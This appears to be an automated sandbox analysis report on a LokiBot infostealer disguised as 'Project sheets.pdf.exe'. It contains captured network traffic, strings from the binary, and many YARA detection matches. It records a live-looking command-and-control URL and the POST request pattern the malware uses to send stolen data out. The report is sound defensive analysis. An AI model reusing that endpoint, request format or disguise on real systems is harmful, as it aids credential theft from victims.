                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=En0ibOgeEuMxY2mpHD2Dt3TdC47cwr0p%2B%2FkxieOBFGmpgV0W8IYvn3FdaUu5Dw3eYi89xBOfLEzFvGaVkysT4VQaqP1FJy4AkZCJvdsml9EBR6cH68soksbWjOz2PA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e50209b4692a5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fRCqN%2B0U%2FIaJlKXxZ0j9RFyfBV2nGu%2Bs3z%2FsZN0sUZyIfeketjJylXcTToil1dlVsJcfYulWZ7AN3gENYb6%2FnTXhsn7WqZfUwLPIOGO3aDtBG%2FjPde0X6n6l2WwZjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e50272bba9060-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:43:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSagRcg%2BXgMM8SLs1fz1sWSt3bmnwStUi%2B9W77wP9McJbCEncWHNRPxRcBP2MEeo4%2BG9DAV%2FyOHi%2Fg70bNZbQEebuoYORKyhvSDwkCg7bgb%2B5KBhVvZvlLt%2BS3qCOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e503a0f0c9b1f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gCIohsXjHhgi0pQExP2v8aaRoEpTkgH8DUsDtSscarAKN6sCn7smeeWy9hlvBjh8%2BS%2BX1zapu%2B5%2BOZP8efkqrsyWJ3QvXrzyY9TiWrZ%2Fxe%2BhhcbnerbQyw2nP%2BtpFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5044da06bba7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pqVP65brrqjsnWByoTI7h%2Beihew4kemEjFaRp39wYal1iwPuhR1mCslnHhL%2BGO7wotp5gPYsoPk9QiiY2rKGIlyolfTNGFDDREhFvp96JrTmCIzOCv6%2Bf2d%2BAnEuOQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e504f0ca29140-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UWOk8nrhWsKBKGWXSePgv8dtkyveOyzmxWIMZzvZ8izB2dT7YQLIajfAbJ7oAJ3TKxuCqWiHVj0DQF4T24Rpb8OGZKiBf8VDNmp0wuRdyBsttE%2FFj7le1FIprpYRXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5059ae8c9018-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KlaIcUFq%2FAKMZr8cKuA7oS9%2F0E%2FRgGaKflZWBKkiJ9ilDyY1Sft%2FkwrTIkWCTxABLWGIMhtPPWfpGj4bz8E23nuql8Rm%2Bdzkjxh4tE3Ibkx0blidQFfJSr%2FOC%2F23lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5062ceb69128-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4dWgjRH38pyPZeD0qb0jk1%2F9qOz8xFjDAiF5Gi2i2AeNn31igXE4WwQOWYQHrpOyIGITs3%2Fzw1da6XTCKPX3NE8Mjee42nTkPpxBuY5u2IZKUgW5M0nLaa1piuJcXw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e506a89e19271-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NwDeet%2BtDovGzYKRHtlc%2BIy9CvtPPAj%2FIhJEPstX1Ci1BEnwzlCsGh%2BuTY0Brr6ZBfTS8J8wHhv9vdUzelvtptMWlvXbpzGKUv3k3lh%2FjuysDwLv3KXOt2JS1GaA8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5074b917bb5b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c0pX9SJrHopzRCsEkDmDxwlNx0C41KoS8krJ5OgxEsOqET4277iXRW3J%2FWp2JHcXROzAxWooOe8cWiTJpbpDaNfjHGikivIw5A1OpyJxaquuggPEYvGU5TP02bgBIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e507b3f7b91d8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:44:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e5081f8b99b98-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                Source: Project sheets.pdf.exeString found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0C
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0I
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0O
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0P
                Source: Project sheets.pdf.exeString found in binary or memory: http://ocsp.digicert.com0R
                Source: Project sheets.pdf.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: cvtres.exe, cvtres.exe, 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, cvtres.exe, 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: cvtres.exe, 00000003.00000002.500737023.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://tixfilmz.gq/Devil/PWS/fre.php
                Source: Project sheets.pdf.exeString found in binary or memory: https://www.digicert.com/CPS0
                Source: unknownHTTP traffic detected: POST /Devil/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: tixfilmz.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4ADFFEA8Content-Length: 190Connection: close
                Source: unknownDNS traffic detected: queries for: tixfilmz.gq
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
                Source: Project sheets.pdf.exe, 00000000.00000002.245726973.0000000001528000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Source: 3.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Project sheets.pdf.exe.41d5530.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
